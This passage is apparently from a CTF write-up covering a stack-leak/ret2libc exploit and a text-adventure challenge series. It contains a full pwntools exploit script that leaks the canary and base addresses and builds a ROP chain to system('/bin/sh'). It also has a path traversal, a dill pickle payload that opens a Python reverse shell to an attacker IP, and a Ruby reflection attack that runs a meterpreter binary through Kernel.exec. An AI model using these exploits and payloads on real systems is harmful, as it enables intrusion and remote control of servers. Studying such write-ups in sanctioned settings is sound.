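    n, s = load_n(stack), load_ptr(stack, S)
    return bytes(stack[s:s + n - 1]), stack[s + n - 1]   # input copy, result byte


def make_payload(candidate: int) -> bytes:
    return b"B" * 60 + b"\x11\x00\x00\x00" + bytes([candidate]) + b"B" * 43 + b"\x82"


leaked, result = sanity_test(build_stack(), make_payload(0x98))
print(leaked[:8].hex(), hex(result))
```

In this model the candidate byte 0x98 makes the third copy start at the return pointer slot, and the byte that ends up in sanity_test_result is the 0x40 at offset 0x10 past it.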

If the candidate offset correctly retrieved the return pointer, the first retrieved byte would be the return pointer's last byte. This seemed to always match 0xa2, so I used this constant to check for a successful candidate. There was a chance that no valid candidates existed; if the return pointer was at 0x7ffcb5617708 but the 3rd memcpy src value was originally set to 0x7ffcb56176X8, I could only brute force the last byte up to 0x7ffcb56176f8. In this case, I simply needed to run the exploit again and hope to get lucky.
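The candidate check can be sketched as follows. The helper names are hypothetical; the constants (a starting offset of 8, a step of 16, the 0xa2 low byte, and the all-1s passphrase) are taken from the description above and the exploit script.

```python
KNOWN_INPUT = b"1" * 16     # passphrase typed at the "Get Recruited" prompt
RET_LOW_BYTE = 0xA2         # low byte the return pointer always seemed to have


def candidate_offsets(start: int = 0x08, step: int = 0x10) -> list:
    """Every value the overwritten low byte of src can take in one run."""
    return list(range(start, 0x100, step))


def unmask(shown: bytes, known: bytes = KNOWN_INPUT) -> bytes:
    """Undo the XOR applied before the string was stored."""
    return bytes(a ^ b for a, b in zip(shown, known))


def looks_like_return_pointer(shown: bytes) -> bool:
    return len(shown) > 0 and unmask(shown)[0] == RET_LOW_BYTE


def recover_pointer(shown: bytes) -> int:
    # Only 6 bytes are usable: the top two bytes of a user-space pointer are
    # null, and the XOR routine stops at the first null byte of the key.
    return int.from_bytes(unmask(shown)[:6], "little")


# Simulate what the "Show" option would print for the pointer in the dump.
shown = bytes(b ^ 0x31 for b in (0x55972B782EA2).to_bytes(6, "little"))
print(hex(shown[0]), hex(recover_pointer(shown)))
```

Since 0xa2 XOR 0x31 is 0x93, checking the first displayed byte against 0x93 is equivalent to checking the unmasked byte against 0xa2.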

I subtracted a fixed offset (0x3EA2) from the return pointer value to get the base address of the executable. Additionally, now that I knew the offset in the stack to the return pointer, I could add or subtract from it accordingly to retrieve other interesting values on the stack, such as __libc_start_main+234, the stack canary, and a valid stack pointer.
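As a worked example of that arithmetic, here is a small sketch using the values from the stack dumps. The function names are invented; the relative offsets (-0x10 + 1, -0x18 and +0x30) are the ones used in the exploit script.

```python
RET_OFFSET_IN_BINARY = 0x3EA2   # distance from the image base to the return site


def image_base(return_pointer: int) -> int:
    return return_pointer - RET_OFFSET_IN_BINARY


def sibling_offsets(ret_low_byte: int) -> dict:
    """Low-byte candidates for other stack slots, relative to the return pointer."""
    return {
        "canary_plus_1": ret_low_byte - 0x10 + 1,   # skip the canary's null byte
        "stack_address": ret_low_byte - 0x18,       # saved memcpy dest pointer
        "libc_start_main_ret": ret_low_byte + 0x30,
    }


def all_reachable(offsets: dict) -> bool:
    """Each offset must fit in the single byte that the overwrite controls."""
    return all(0 <= value <= 0xFF for value in offsets.values())


print(hex(image_base(0x55972B782EA2)))
print({name: hex(value) for name, value in sibling_offsets(0x98).items()})
```

The reachability check mirrors the guard in the script: if the return pointer sits too close to either end of its 256-byte window, one of the other slots cannot be addressed and the exploit has to be restarted.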

With those values, I could send a large input with the proper stack canary and overwrite the return pointer to my desired function pointer, such as system in libc. I avoided crashing the three memcpys by overwriting the src and dest arguments to the leaked valid stack addresses and setting the size argument to something small like 1.
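The part of the final input that rebuilds the stack frame can be sketched like this. It uses the standard struct module instead of pwntools, and the function name frame_overwrite is made up; the layout (108 filler bytes, n, three pointers, canary, saved frame pointer) follows the stack dumps above.

```python
import struct


def frame_overwrite(stack_address: int, canary: int) -> bytes:
    payload = b"B" * 108                              # filler up to n
    payload += struct.pack("<I", 1)                   # n = 1 keeps every copy tiny
    payload += struct.pack("<Q", stack_address) * 3   # s, src and dest slots
    payload += struct.pack("<Q", canary)              # restore the real canary
    payload += b"A" * 8                               # saved frame pointer slot
    return payload                                    # the return address goes next


frame = frame_overwrite(0x7FFCB56175D0, 0x697EE648D1686300)
print(hex(len(frame)))
```

The length works out to 0x98 bytes, which matches the distance between the start of the input buffer (0x...7600) and the return pointer slot (0x...7698) in the dumps, so whatever is appended next lands on the return address.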

At first, I tried to return to an interesting function in the binary that printed the flag:

__int64 read_flag()
{
  char v1; // [rsp+Fh] [rbp-231h] BYREF
  char v2[264]; // [rsp+10h] [rbp-230h] BYREF
  _QWORD v3[37]; // [rsp+118h] [rbp-128h] BYREF

  v3[34] = __readfsqword(0x28u);
  std::fstream::basic_fstream(v2);
  std::fstream::open(v2, "/root/f1988cec5de9eaa97ab11740e10b1fc8d6db8123", 8LL);
  if ( (unsigned __int8)std::ios::operator!(v3) )
  {
    std::operator<<<std::char_traits<char>>(&std::cout, "No such file\n");
  }
  else
  {
    while ( 1 )
    {
      std::operator>><char,std::char_traits<char>>(v2, &v1);
      if ( (unsigned __int8)std::ios::eof(v3) )
        break;
      std::operator<<<std::char_traits<char>>(&std::cout, (unsigned int)v1);
    }
    std::operator<<<std::char_traits<char>>(&std::cout, "\n");
  }
  std::fstream::close(v2);
  std::fstream::~fstream(v2);
  return 0LL;
}

However, despite the exploit working locally, I could not get it to work remotely. I assumed that this was because the executable crashed too quickly to return output over the network. As such, I decided to go the ret2libc route and get a shell by adding system to the call stack. Since the offsets in libc varied widely over different versions, I used the file disclosure vulnerability from earlier to leak /proc/self/maps and /etc/os-release to determine the exact OS and libc versions, which were "Ubuntu 20.04.3 LTS (Focal Fossa)" and libc-2.31.so respectively. Since Googling the server's IP address revealed that it belonged to a DigitalOcean Singapore cluster, I spun up a free Droplet instance on the same cluster with the matching OS version to retrieve the offsets. This turned out to be a hidden bonus because the proximity of my Droplet instance to the target server allowed my exploit to catch the shell faster before the program crashed.

Finally, I needed to pop the pointer to /bin/sh in libc into RDI before calling system. This was because the x64 calling convention uses RDI as the first argument for a function call. I used rp++ to dump ROP gadgets from the binary and added the POP RDI, RET gadget to the overwritten call stack.
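The ret2libc portion of the chain can be sketched with the standard struct module. The offsets below are the ones that appear in the exploit script and only apply to that specific binary and libc build; the base addresses in the example call are placeholders, not leaked values. The sketch leaves out the read_flag address that the full script places ahead of these three entries.

```python
import struct

POP_RDI_RET = 0x5073            # gadget offset inside the challenge binary
LIBC_START_MAIN_RET = 0x270B3   # offset of the leaked libc return address
SYSTEM = 0x55410                # system() offset in the target libc
BIN_SH = 0x1B75AA               # "/bin/sh" string offset in the target libc


def rop_chain(binary_base: int, libc_leak: int) -> bytes:
    libc_base = libc_leak - LIBC_START_MAIN_RET
    return struct.pack(
        "<QQQ",
        binary_base + POP_RDI_RET,   # pop rdi; ret
        libc_base + BIN_SH,          # value popped into RDI (first argument)
        libc_base + SYSTEM,          # ret lands in system("/bin/sh")
    )


# Placeholder bases purely for illustration.
example_binary_base = 0x555555554000
example_libc_base = 0x7FFFF7DC3000
chain = rop_chain(example_binary_base, example_libc_base + LIBC_START_MAIN_RET)
print(chain.hex())
```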

At long last, I completed my full exploit code:

from pwn import *

p = remote('<IP ADDRESS>', 53619)
##p = process('./1adb53a4b156cef3bf91c933d2255ef30720c34f')

def byte_xor(ba1, ba2):
    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])

## leak base_addr of executable
return_pointer_offset = 8
while True:
    # send payload
    p.recvuntil("> ")
    p.sendline(b'1')
    payload = b'B' * 60                                 # offset
    payload += b'\x11\x00\x00\x00'                      # third memcpy n; vary this until sanity test passes
    payload += packing.p8(return_pointer_offset)        # candidate offset to return pointer on stack
    payload += b'B' * 43                                # more offset
    payload += b'\x82'                                  # first memcpy n / second memcpy n * 2
    p.sendline(payload)

    # retrieve sanity_test_input
    p.recvuntil("> ")
    p.sendline(b'2')
    if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
        p.sendline(b'1111111111111111')
        p.recvuntil("> ")
        p.sendline(b'4')
        p.recvuntil("`======/")
        p.recvline()
        candidate = p.recvline()
        print(candidate.hex())
        if 0x93 == candidate[0]:                        # confirm that this is a leaked function address; last byte is 0xa2 == 0x93 XOR 0x31
            base_addr = (int.from_bytes(byte_xor(candidate[:6][::-1], b'111111'), 'big', signed=False) - 0x3EA2).to_bytes(8, byteorder='big', signed=False)
            log.info('Base address: {}'.format(base_addr.hex()))
            p.recvuntil("> ")
            p.sendline(b'6')
            break
        p.recvuntil("> ")
        p.sendline(b'6')
    return_pointer_offset += 16

libc_start_main_plus_234_offset = return_pointer_offset + 0x30        # offset in stack from function pointer to __libc_start_main+234
canary_offset = return_pointer_offset - 0x10 + 1                      # offset in stack from function pointer to canary + 1 (skip null token)
stack_address_offset = return_pointer_offset - 0x18                   # offset in stack from return pointer to a saved stack address (the memcpy dest pointer slot)

if stack_address_offset < 0 or libc_start_main_plus_234_offset > 255:
    log.error("Base offset is too low")

## leak canary
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # ensures that sanity_test_result passes
payload += packing.p8(canary_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)

p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    canary = byte_xor(candidate[:7][::-1], b'1111111') + b'\x00'    # restore null last byte

    log.info("Canary: {}".format(canary.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')

## leak libc_main_plus_234
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # ensures that sanity_test_result == B which passes test4 #21 for local
payload += packing.p8(libc_start_main_plus_234_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)

p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    libc_main_plus_234 = b'\x00\x00' + byte_xor(candidate[:6][::-1], b'111111')
    log.info('libc_main_plus_234 address: {}'.format(libc_main_plus_234.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')

## leak stack address
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x19\x00\x00\x00' # ensures that sanity_test_result passes test4
payload += packing.p8(stack_address_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)

p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    stack_address = b'\x00\x00' + byte_xor(candidate[:6][::-1], b'111111')
    log.info('Stack address: {}'.format(stack_address.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')


## prepare addresses
flag_function_address = (int.from_bytes(base_addr, 'big', signed=False) + 0x3BBC).to_bytes(8, byteorder='big', signed=False)
log.info('Flag function address: {}'.format(flag_function_address.hex()))

get_recruited_address = (int.from_bytes(base_addr, 'big', signed=False) + 0x3606).to_bytes(8, byteorder='big', signed=False)
log.info('get_recruited function address: {}'.format(get_recruited_address.hex()))

pop_rdi_ret = (int.from_bytes(base_addr, 'big', signed=False) + 0x5073).to_bytes(8, byteorder='big', signed=False)
log.info('pop_rdi_ret address: {}'.format(pop_rdi_ret.hex()))

libc_base_addr = (int.from_bytes(libc_main_plus_234, 'big', signed=False) - 0x270B3).to_bytes(8, byteorder='big', signed=False)
log.info('libc_base_addr address: {}'.format(libc_base_addr.hex()))

libc_system_addr = (int.from_bytes(libc_base_addr, 'big', signed=False) + 0x55410).to_bytes(8, byteorder='big', signed=False)
log.info('libc_system_addr: {}'.format(libc_system_addr.hex()))

libc_bin_sh_addr = (int.from_bytes(libc_base_addr, 'big', signed=False) + 0x1B75AA).to_bytes(8, byteorder='big', signed=False)
log.info('libc_bin_sh_addr: {}'.format(libc_bin_sh_addr.hex()))
dec_ecx_ret = (int.from_bytes(base_addr, 'big', signed=False) + 0x2AE2).to_bytes(8, byteorder='big', signed=False)

## prepare final payload
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 108                    # offset
payload += b'\x01\x00\x00\x00'          # n
payload += stack_address[::-1]          # valid stack address
payload += stack_address[::-1]          # valid stack address
payload += stack_address[::-1]          # valid stack address
payload += canary[::-1]                 # valid canary
payload += b'A' * 8                     # offset            
payload += flag_function_address[::-1]  # try to call flag function - somehow this doesn't work remotely?
payload += pop_rdi_ret[::-1]            # ROP to pop pointer to "/bin/sh" to RDI
payload += libc_bin_sh_addr[::-1]       # pointer to "/bin/sh"
payload += libc_system_addr[::-1]       # pointer to system

## send final payload
print(p.recvline())
print(p.recv())
p.sendline(payload)

p.interactive()

I ran this several times on my Droplet instance and eventually got my shell.

Shell

TISC{30e903d64775c0120e5c244bfe8cbb0fd44a908b}

Level 9: 1865 Text Adventure

This was my favourite level and felt like a digital work of art. I loved the storyline and although one of the domains was Pwn, it was actually Web as you will see soon. Finally, it involved a lot of code review, which I enjoyed.

It began with a tumble...

Part 1: Down the Rabbit Hole

Domains: Pwn, Cryptography

Text adventures are fading ghosts of a faraway past but this one looks suspiciously brand new... and it has the signs of PALINDROME all over it.

Our analysts believe that we need to learn more about the White Rabbit but when we connect to the game, we just keep getting lost!

Can you help us access the secrets left in the Rabbit's burrow?

The game is hosted at 165.22.48.155:26181.

No kernel exploits are required for this challenge.

Connecting to <IP ADDRESS>:26181 kicked off a long, scrolling text adventure.

Alice in Wonderland

I could look around my location, move to another exit, read notes, or get items. I set about enumerating every path in the text adventure. Along the way, I picked up several useful items:

  1. The Pocket Watch: This gave me access to an options menu, which I used to turn off the annoying scrolling text.
  2. The Looking Glass: This gave me the ability to teleport to other locations in the story. teleport bottom-of-a-pit/deeper-into-the-burrow
  3. Golden Hookah: This gave me the ability to save messages... somewhere. blowsmoke <NAME> <MESSAGE>.

After a few twists and turns, the text adventure reached a dead end.

[cosmic-desert] move tear-in-the-rift
You have moved to a new location: 'tear-in-the-rift'.

You look around and see:
A curious light shines in the distance. You cannot quite reach it though.

Music tinkles through the rift:

    A very merry unbirthday
    To you
    Who, me?
    Yes, you
    Oh, me
    Let's all congratulate us with another cup of tea
    A very merry unbirthday to you

There are the following things here:
  * README (note)

[tear-in-the-rift] read README
You read the writing on the note:
Do you hear that? What lovely party sounds!

Wouldn't it be lovely to crash it and get some tea and crumpets?

Too bad you're stuck here!

You can cage a swallow, can't you, but you can't swallow a cage, can you?

Fly back to school now, little starling.

- PALINDROME

With nowhere left to go, I began messing about with the items. My first clue surfaced when I used the Golden Hookah to send a message with a format string.

[tear-in-the-rift] blowsmoke spaceraccoon %s
Smoke bellows from the lips of spaceraccoon to form the words, "%s."
Curling and curling...
Traceback (most recent call last):
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 708, in run_game
    self.evaluate(user_line)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 627, in evaluate
    cmd.run(args)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 511, in run
    response = urlopen(url)
  File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python3.8/urllib/request.py", line 531, in open
    response = meth(req, response)
  File "/usr/lib/python3.8/urllib/request.py", line 640, in http_response
    response = self.parent.error(
  File "/usr/lib/python3.8/urllib/request.py", line 569, in error
    return self._call_chain(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain
    result = func(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 649, in http_error_default
    raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 400: Bad Request

The Python backend was trying to send an HTTP request with my message! However, further experimentation with traversal and command injection payloads failed to yield any results. I moved on to The Looking Glass. I attempted several invalid inputs, including a long string:

[cosmic-desert] teleport vast-emptiness/eternal-desolation/cosmic-desert/<A * 200>
Traceback (most recent call last):
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 708, in run_game
    self.evaluate(user_line)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 627, in evaluate
    cmd.run(args)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 475, in run
    if rel_path.exists() and rel_path.is_dir():
  File "/usr/lib/python3.8/pathlib.py", line 1407, in exists
    self.stat()
  File "/usr/lib/python3.8/pathlib.py", line 1198, in stat
    return self._accessor.stat(self)
OSError: [Errno 36] File name too long: '/opt/wonderland/down-the-rabbithole/stories/vast-emptiness/eternal-desolation/cosmic-desert/<A * 200>'

This looked like a directory traversal! Perhaps teleporting meant moving to a different folder location in the server. I took the next obvious step.

[tear-in-the-rift] teleport ../../../../etc
You have moved to a new location: 'etc'.

You look around and see:
Darkness fills your senses. Nothing can be discerned from your environment.
There are the following things here:
  * environment (note)
  * fstab (note)
  * networks (note)
  * mke2fs.conf (note)
  * ld.so.conf (note)
  * passwd (note)
  * shells (note)
  * debconf.conf (note)
  * ld.so.cache (note)
  * legal (note)
  * xattr.conf (note)
  * hostname (note)
  * e2scrub.conf (note)
  * issue (note)
  * bindresvport.blacklist (note)
...

Bingo! Now that I was in a different folder, I could read files with the read command. After enumerating various locations, I ended up in /home/rabbit which contained the first flag.

[mouse] teleport ../../../../home/rabbit
You have moved to a new location: 'rabbit'.

You look around and see:
You enter the Rabbit's burrow and find it completely ransacked. Scrawled across the walls of the
tunnel is a message written in blood: 'Murder for a jar of red rum!'.

Your eyes are drawn to a twinkling letter and lockbox that shines at you from the dirt.

There are the following things here:
  * flag2.bin (note)
  * flag1 (note)

[rabbit] read flag1
You read the writing on the note:
TISC{r4bbb1t_kn3w_1_pr3f3r_p1}

TISC{r4bbb1t_kn3w_1_pr3f3r_p1}
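Looking back at the teleport traversal, the path arithmetic can be reproduced without touching the filesystem. This is a sketch that assumes the game simply joins the teleport argument onto the stories directory shown in the traceback; stays_in_stories is a hypothetical containment check, not something taken from rabbithole.py, and normpath does not account for symlinks.

```python
import posixpath

STORIES = "/opt/wonderland/down-the-rabbithole/stories"


def teleport_target(argument: str) -> str:
    """Join the user-supplied location onto the stories directory."""
    return posixpath.normpath(posixpath.join(STORIES, argument))


def stays_in_stories(argument: str) -> bool:
    """The kind of check that would have rejected the traversal."""
    target = teleport_target(argument)
    return target == STORIES or target.startswith(STORIES + "/")


for arg in ("vast-emptiness/eternal-desolation", "../../../../etc", "../../../../home/rabbit"):
    print(arg, "->", teleport_target(arg), stays_in_stories(arg))
```

Four parent references are exactly enough to climb from stories to the filesystem root, which is why the same prefix worked for both /etc and /home/rabbit.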

Part 2: Pool of Tears

It looks like the Rabbit knew too much about PALINDROME. Within his cache of secrets lies a special device that might just unlock clues to tracking down the elusive trickster. However, our attempts to read it yield pure gibberish.

It appears to require... activation. To activate it, we must first become the Rabbit.

Please assume the identity of the Rabbit.

The challenge description hinted that I needed to get a working shell as rabbit to execute flag2.bin. I returned to the /opt/wonderland/down-the-rabbithole folder that contained the Python source code for the text adventure. rabbithole.py contained most of the game logic. Right away, I noticed that it imported pickletools and used Python object deserialisation (dill.loads) to "get" items.

def run(self, args):
    if len(args) < 2:
        letterwise_print("You don't see that here.")
        return
    for i in self.game.get_items():
        if (args[1] + '.item') == i.name and args[1] not in self.game.inventory:
            got_something = True
            # Check that the item must be serialised with dill.
            item_data = open(i, 'rb').read()
            if not self.validate_stream(item_data):
                letterwise_print('Seems like that item may be an illusion.')
                return
            item = dill.loads(item_data)
            letterwise_print("You pick up '{}'.".format(item.key))
            self.game.inventory[item.key] = item
            item.prepare(self.game)
            item.on_get()
            return
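To see why loading an attacker-controlled item is dangerous, here is a minimal demonstration using the standard pickle module as a stand-in for dill (dill builds on the same protocol). The Demo class is invented for illustration and the expression it evaluates is deliberately harmless.

```python
import pickle


class Demo:
    def __reduce__(self):
        # Tells the unpickler: "to rebuild me, call eval('6 * 7')".
        return (eval, ("6 * 7",))


blob = pickle.dumps(Demo())
result = pickle.loads(blob)   # the callable runs during loading
print(result)
```

The loaded value is whatever the callable returned rather than a Demo instance, so any function reachable by the unpickler can be invoked with attacker-chosen arguments.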

Since Python object deserialisation was an easy code execution vector, I focused on this lead. How could I create a pickle file on the server to β€œget” later? Enumerating more folders, I realised that /opt/wonderland contained the source code of two other applications:

[..] teleport ../..
You have moved to a new location: '..'.

You look around and see:
Darkness fills your senses. Nothing can be discerned from your environment.
You see exits to the:
  * logs
  * pool-of-tears
  * a-mad-tea-party
  * down-the-rabbithole
  * utils

a-mad-tea-party turned out to be a Java application, while pool-of-tears contained a Ruby on Rails web API. In logs, I found some of the messages I sent using blowsmoke earlier. This suggested that blowsmoke enabled me to write files, which was exactly what I needed.

To prepare my pickle, I referred to the generate_items.py script from the source code of down-the-rabbithole. The application validated items by checking for rabbithole, dill._dill, and on_get properties, so I reused the code to meet these requirements with one important difference: my payload generation script inserted a Python reverse shell in on_get.

import dill
import types
from rabbithole import Item
import socket
import os
import pty
import urllib.parse

dill.settings['recurse'] = True

def write_object(location, obj):
    '''Writes an object to the specified location.
    '''
    with open(location, 'wb') as f:
        dill.dump(obj, f, recurse=True)

def make_item(key, on_get):
    '''Makes a new item dynamically.
    '''
    item = Item(key)
    item.on_get = types.MethodType(on_get, item)
    return item

def payload_on_get(self):
    '''Spawn a reverse shell when the item is picked up.
    '''
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("<IP ADDRESS>",4242))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    pty.spawn("/bin/sh")

def setup_payload():
    item = make_item('payload', payload_on_get)
    write_object('payload.item', item)

if __name__ == '__main__':
    setup_payload()
    # open_payload()
    with open('payload.item', 'rb') as file:
        print("Generated {}".format(urllib.parse.quote(file.read())))

After generating the URL-encoded payload, I sent it off with blowsmoke a.item <URL-ENCODED PAYLOAD>. This saved the payload to /opt/wonderland/logs/tear-in-the-rift-a.item. Finally, in the text adventure game, I teleported to /opt/wonderland/logs and ran get tear-in-the-rift-a.item to execute the payload. To save time, I automated the entire process with pwntools.


from pwn import *
import urllib.parse

p = remote('<IP ADDRESS>', 26181)

print(p.recvuntil(b']'))
p.sendline(b'move a-shallow-deadend')
print(p.recvuntil(b']'))
p.sendline(b'get pocket-watch')
print(p.recvuntil(b']'))
p.sendline(b'options text_scroll False')
print(p.recvuntil(b']'))
p.sendline(b'back')
print(p.recvuntil(b']'))
p.sendline(b'move deeper-into-the-burrow')
print(p.recvuntil(b']'))
p.sendline(b'move a-curious-hall')
print(p.recvuntil(b']'))
p.sendline(b'get pink-bottle')
print(p.recvuntil(b']'))
p.sendline(b'move a-pink-door')
print(p.recvuntil(b']'))
p.sendline(b'move maze-entrance')
print(p.recvuntil(b']'))
p.sendline(b'move knotted-boughs')
print(p.recvuntil(b']'))
p.sendline(b'move dazzling-pines')
print(p.recvuntil(b']'))
p.sendline(b'move a-pause-in-the-trees')
print(p.recvuntil(b']'))
p.sendline(b'move confusing-knot')
print(p.recvuntil(b']'))
p.sendline(b'move green-clearing')
print(p.recvuntil(b']'))
p.sendline(b'move a-fancy-pavillion')
print(p.recvuntil(b']'))
p.sendline(b'get fluffy-cake')
print(p.recvuntil(b']'))
p.sendline(b'move along-the-rolling-waves')
print(p.recvuntil(b']'))
p.sendline(b'move a-sandy-shore')
print(p.recvuntil(b']'))
p.sendline(b'move a-mystical-cove')
print(p.recvuntil(b']'))
p.sendline(b'get looking-glass')
print(p.recvuntil(b']'))
p.sendline(b'back')
print(p.recvuntil(b']'))
p.sendline(b'move into-the-woods')
print(p.recvuntil(b']'))
p.sendline(b'move further-into-the-woods')
print(p.recvuntil(b']'))
p.sendline(b'move nearing-a-clearing')
print(p.recvuntil(b']'))
p.sendline(b'move clearing-of-flowers')
print(p.recvuntil(b']'))
p.sendline(b'get morning-glory')
print(p.recvuntil(b']'))
p.sendline(b'move under-a-giant-mushroom')
print(p.recvuntil(b']'))
p.sendline(b'get golden-hookah')
print(p.recvuntil(b']'))
p.sendline(b'move eternal-desolation')
print(p.recvuntil(b']'))
p.sendline(b'move cosmic-desert')
print(p.recvuntil(b']'))
p.sendline(b'move tear-in-the-rift')
print(p.recvuntil(b']'))


## read flag2.bin
## p.sendline(b'teleport ../../../../home/rabbit')
## print(p.recvuntil(b'[rabbit]'))
## p.sendline(b'read flag2.bin')
## flag2_bin = p.recvuntil(b']')
## with open('flag2.bin', 'wb') as file:
##     file.write(flag2_bin)

## send payload
with open('payload.item', 'rb') as file:
    p.sendline(b'blowsmoke a.item ' + urllib.parse.quote(file.read()).encode())
print(p.recvuntil(b']'))

## execute payload
p.sendline(b'teleport ../../../../opt/wonderland/logs')
print(p.recvuntil(b']'))
p.sendline(b'get tear-in-the-rift-a')
print(p.recvuntil(b']'))


p.interactive()

The exploit went off without a hitch and I got my shell.

Reverse Shell

TISC{dr4b_4s_a_f00l_as_al00f_a5_A_b4rd}

Part 3: Advice from a Caterpillar

PALINDROME's taunts are clear: they await us at the Tea Party hosted by the Mad Hatter and the March Hare. We need to gain access to it as soon as possible before it's over.

The flowers said that the French Mouse was invited. Perhaps she hid the invitation in her warren. It is said that her home is decorated with all sorts of oddly shaped mirrors but the tragic thing is that she's afraid of her own reflection.

This challenge description included the key word “reflection”. I immediately thought of Java reflection attacks but the Java app a-mad-tea-party was executed by the hatter user rather than mouse. From my shell, I exfiltrated all the source code in /opt/wonderland and reviewed the pool-of-tears Rails application run by mouse.

The controller logic for the blowsmoke API at pool-of-tears/app/controllers/smoke_controller.rb had the following code.

  def remember
    # Log down messages from our happy players!

    begin
      ctype = "File"
      if params.has_key? :ctype
        # Support for future appending type.
        ctype = params[:ctype]
      end

      cargs = []
      if params.has_key?(:cargs) && params[:cargs].kind_of?(Array)
        cargs = params[:cargs]
      end

      cop = "new"
      if params.has_key?(:cop)
        cop = params[:cop]
      end

      if params.has_key?(:uniqid) && params.has_key?(:content)
        # Leave the kind messages
        fn = Rails.application.config.message_dir + params[:uniqid]
        cargs.unshift(fn)
        c = ctype.constantize
        k = c.public_send(cop, *cargs)
        if k.kind_of?(File)
          k.write(params[:content])
          k.close()
        else
          # TODO: Implement more types when we need distributed logging.
          # PALINDROME: Won't cat lovers revolt? Act now!
          render :plain => "Type is not implemented yet."
          return
        end

      else
        render :plain => "ERROR"
        return
      end
    rescue => e
      render :plain => "ERROR: " + e.to_s
      return
    end

The comments and the use of ctype.constantize attracted my attention and I wondered if Ruby reflection attacks existed. They did.

Based on the source code, the ctype parameter was resolved to the Ruby class or module of the same name with ctype.constantize. Thereafter, c.public_send called any of that object's public methods based on the cop parameter. The method was called with arguments from the cargs array parameter.

However, pool-of-tears featured an interesting twist: because it prepended the Rails.application.config.message_dir + params[:uniqid] string to the cargs array, I could not execute anything I wanted; the method needed to accept the concatenated file path as the first argument. For example, one publicly-known Ruby reflection payload used Object.public_send("send","eval","system 'uname'"), which required the first argument to send to be eval. Since eval was a private method for Object, I could not execute it directly with public_send.
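For readers more at home in Python, the shape of this primitive can be sketched with getattr. This is only a rough analogue of the Rails controller, not a port of it: the remember function, its defaults, and the use of builtins as the lookup namespace are assumptions for illustration, and MESSAGE_DIR is inferred from where my earlier messages landed.

```python
import builtins

# Assumed from the log location seen earlier in the write-up.
MESSAGE_DIR = "/opt/wonderland/logs/"


def remember(uniqid, ctype="str", cop="upper", cargs=None):
    """Hypothetical Python analogue of the reflective call in the controller."""
    # The server always forces the file path to be the first argument.
    args = [MESSAGE_DIR + uniqid] + list(cargs or [])
    target = getattr(builtins, ctype)      # roughly ctype.constantize
    return getattr(target, cop)(*args)     # roughly c.public_send(cop, *cargs)


# The caller picks the class and the method, but not the first argument.
print(remember("a.item"))
print(remember("x", ctype="str", cop="split", cargs=["/"]))
```

Whatever class and method are chosen, the call only helps an attacker if that method does something useful with a file path in first position.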

I searched the Ruby documentation for a suitable class and public method that allowed me to execute code. Eventually, I found the Kernel module, which exposes a public exec method. The first argument determined the command to be executed. Since this could be a file path, I realised that I could exploit a path traversal by sending a uniqid parameter like ../../../../../tmp/meterpreter. This led to c.public_send('exec', '/opt/wonderland/logs/../../../../../tmp/meterpreter'), therefore executing my meterpreter payload.
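The effect of the traversal on the concatenated path can be checked offline. A small sketch, assuming the message directory is /opt/wonderland/logs/ as in the call above; resolved_target is a hypothetical helper, and posixpath.normpath only approximates what the operating system does (it ignores symlinks).

```python
import posixpath

# Assumed value of Rails.application.config.message_dir.
MESSAGE_DIR = "/opt/wonderland/logs/"


def resolved_target(uniqid):
    """Collapse the '..' segments the way a POSIX path lookup would."""
    return posixpath.normpath(MESSAGE_DIR + uniqid)


print(resolved_target("a.item"))
print(resolved_target("../../../../../tmp/meterpreter"))
```

Extra ../ segments are harmless because climbing above the root directory stays at the root, so over-shooting the depth still lands on /tmp.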

I uploaded the payload to /tmp/met64.elf, then triggered the API with curl 'http://localhost:4000/api/v1/smoke?ctype=Kernel&cop=exec&uniqid=../../../../tmp/met64.elf&content=test'. After a few tense seconds, I got my shell!

/home/mouse contained a binary flag3.bin which I executed to retrieve the flag. The directory also included an-unbirthday-invitation.letter:

Dear French Mouse,

    The March Hare and the Mad Hatter
        request the pleasure of your company
            for an tea party evening filled with
                clocks, food, fiddles, fireworks & more


    Last Month
        25:60 p.m.
            By the Stream, and Into the Woods
                Also available by way of port 4714

    Comfortable outdoor attire suggested

PS: Dormouse will be there!

